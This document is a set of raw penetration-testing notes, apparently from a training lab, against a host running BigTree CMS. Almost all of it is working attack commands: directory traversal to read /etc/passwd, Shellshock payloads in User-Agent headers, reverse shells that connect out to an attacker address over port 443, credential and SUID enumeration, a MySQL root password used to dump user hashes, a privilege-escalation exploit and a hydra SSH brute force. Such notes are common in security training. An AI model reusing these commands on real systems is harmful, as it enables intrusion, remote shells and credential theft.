nmap -sTVC 10.11.1.71 -Pn > nmap.txt
gobuster dir  -u http://bigtreecms.org/ -w /usr/share/dirb/wordlists/common.txt -x txt,php,py,cgi > gobuster.txt
gobuster dir -u http://10.11.1.71/  -w /usr/share/dirb/wordlists/vulns/cgis.txt   -s '200,204,301,302,307,403,500' -e >cgi.txt
gobuster dir -u http://10.11.1.71/  -w /usr/share/dirb/wordlists/vulns/cgis.txt   -s '200,204,403,500' -e >cgi.txt



curl -i http://10.11.1.71/cgi-bin/test.cgi -s > text.cgi.txt
curl 'http://10.11.1.71/cgi-bin/admin.cgi' -i -s > before.txt
curl 'http://10.11.1.71/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd' -i -s > after.txt

curl -v http://10.11.1.71/cgi-bin/admin.cgi -s >/dev/null
curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable"; bash -c id' http://10.11.1.71/cgi-bin/admin.cgi
curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' http://10.11.1.71/cgi-bin/admin.cgi
curl -H "User-Agent: () { :; }; bash -c 'echo aaaa; uname -a; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi
curl -H "User-Agent: () { :; }; set" http://10.11.1.71/cgi-bin/admin.cgi
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; uname -a; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa;  uname -a; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'

cmd="hostname -f"
cmd="/bin/nc -h 2>&1"
cmd="find / -name 'nc.*' -type f"
cmd="ncat 192.168.119.197 443 -e /bin/bash"
because victim nc is not available for nc -e

curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa;  ${cmd}; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
cmd="/bin/bash -i >& /dev/tcp/192.168.119.197/443 0>&1"


README.md  gobuster not have this
BigTree CMS 4.0



GET THE REVERSE SHELL





What's the OS? What version? What architecture?
cat /etc/*-release
uname -i
lsb_release -a (Debian based OSs)

Who are we? Where are we?
id
pwd

Who uses the box? What users? (And which ones have a valid shell)
cat /etc/passwd
grep -vE "nologin|false" /etc/passwd

What's currently running on the box? What active network services are there?
ps aux
netstat -antup

What's installed? What kernel is being used?
dpkg -l (Debian based OSs)
rpm -qa (CentOS / openSUSE )
uname -a
cat /etc/issue
find / -perm -u=s -type f 2>/dev/null


grep "password" -r  in /var/www/html/core
find . -iname '*config*'
mysql -uroot -pzaq1xsw2cde3 -e 'show databases;'
mysql -uroot -pzaq1xsw2cde3 -e 'use mysql ;select Host,User,Password  from user'

searchsploit ossec | grep -v '/dos/'


locate perl-reverse-shell.pl

python alpha-root.py -c '/usr/bin/perl /tmp/alpha-shell.pl'



hydra -l gibson -P /home/qoo7972365/Desktop/rockyou.txt -T 20 10.11.1.71 ssh

